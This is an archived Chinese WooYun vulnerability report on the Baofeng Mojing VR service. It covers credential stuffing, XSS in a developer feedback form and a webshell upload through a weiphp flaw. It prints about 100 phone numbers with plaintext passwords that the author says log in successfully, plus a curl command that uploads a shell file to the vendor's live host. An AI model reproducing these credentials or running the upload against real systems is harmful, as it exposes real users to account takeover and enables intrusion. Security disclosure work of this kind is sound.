当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204957

漏洞标题:暴风魔镜多处漏洞打包(撞库/xss/Getshell)

相关厂商:暴风魔镜

漏洞作者: 千机

提交时间:2016-05-04 15:36

修复时间:2016-06-18 15:40

公开时间:2016-06-18 15:40

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

RT,键盘表哥收到了礼物,我也来一发

详细说明:

首先是撞库,成功撞出了一大堆的账户
登录处未做次数以及验证码处理

282.png


Payload1	Payload2	Length
13846177646 sdhoujie01 887
18180093239 wan6290012 884
13123276688 ninng183 882
13737026362 19770625 876
18291957456 zyh262509 876
15577110761 Dc19880717 876
18633762327 nnd86amc 874
13721477762 aini1314 872
18576432432 qq6935868 871
15659931773 hedaoqin55 868
13897463679 w96104216 868
18965665560 whf214145 868
13555542401 0325511y 868
18245301237 z6521426 868
13830289123 1116qiyang 861
18952455047 19881120 860
18020733707 fs0408039 860
15651767055 198566 860
18641191660 5624110 860
13915528614 Lh7758521 860
18735376992 lxx4424586 860
13336920317 a65476298 860
18628278998 yang6638253 860
18571471440 ps13388 860
15241766922 shishuai21 860
13581522846 asdf888 860
18883286082 a43630642 860
15800295032 a123456 860
13676799770 wsczh0418 860
13883649807 c83399780 860
13429232187 hzj1993523 855
15264728945 qq4252426 854
13777274896 w8892w63 852
18968180726 1714131211 852
13846071539 wj584521 852
13760341694 6209321 852
13770914589 zhang1984 852
13819272323 1925852625 852
15959025900 ilovebin 852
13264228811 77582589a 852
18621600258 qcx282 852
15030412563 11111a 848
15961078309 q8614789 848
18977150556 6841698 845
18078275817 qq4366456 844
15982557785 lixinxing 844
18511821121 61428202 844
18934311307 liyi801219 844
15129190467 watzx1314 842
15986989274 xwh5201314 841
15292319879 20052134 840
15166750959 19970721 840
15642877000 760219 840
13865041970 zjmzzl123 840
15775822345 520wenjie 840
13523649911 zhouyuan77 840
13736491447 992892323 840
18013730125 yinlei520 840
13549850518 830614 840
13424377369 19840420 840
13241814968 zmsx11 840
13877336700 ssdy931422 840
13600893906 z8356056 840
13525127305 www123456 840
13728072746 a5362257 840
15988438505 lxj620 840
18357363092 jy19900820 839
18694049554 q543203447 839
13099898899 zxcv1234 839
13241233214 sn6331907 838
13834904042 jj19810427 838
13738073127 alex1123 838
15250581862 ai198797 838
13717788554 197951 838
13410105357 a8895578 838
15800616740 134679 838
13722050101 364762298 838
18621704979 weed00 838
15629082135 1988927zs 838
13658502233 xushaoyuna 838
18805727654 yk890102 838
15277940262 11121314a 838
15073389123 a250275701 838
15018514831 swsw000 838
18073115125 19841224o 838
13784035359 ch820714 838
15961765073 a9880630 838
13698712331 3434158lyf 838
13919791750 1990127ybs 838
18621891698 liwei1981 838
13378120671 qw27764991 838
13223076570 8853qq 837
15935229909 19862188a 836
13728444422 a2639902 836
18626318507 3391929 835
15682138005 95ll10 835
15030091377 5461628 835
13817798135 zsh123 835
13828084568 hjj619000 835
18377906611 lby199061 835
13846467035 wwkfghy520 835
15653811505 gao123456 834
13872839824 123a123a 834
13422898453 7333133 833
13874408393 zl810315 833


这些账户都能登录

283.png


284.png


然后是xss,
存在于魔镜开发者平台的反馈处

http://open.mojing.cn/developer/feedback/submit


285.png


286.png


然后是getshell,这个弄了好久,又学到了新姿势

http://weixin.mojing.cn/index.php?s=/Home/User/login/from/1.html


这个后台是用weiphp开发的
参考这个漏洞

 WooYun: weiphp3.0微信开发框架前台getshell第二弹(无需登录) 


先在本地弄个shell文件

287.png


然后通过以下这个命令将shell上传上去

curl -F 'download=@flags.php' http://weixin.mojing.cn/index.php?s=/Home/File/uploadPicture/


成功上传shell

288.png


289.png


290.png


291.png

漏洞证明:

291.png

修复方案:

改改改

版权声明:转载请注明来源 千机@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-04 15:38

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-04 17:31 | Mazing ( 路人 | Rank:27 漏洞数:7 )

    啊。我也去碰碰运气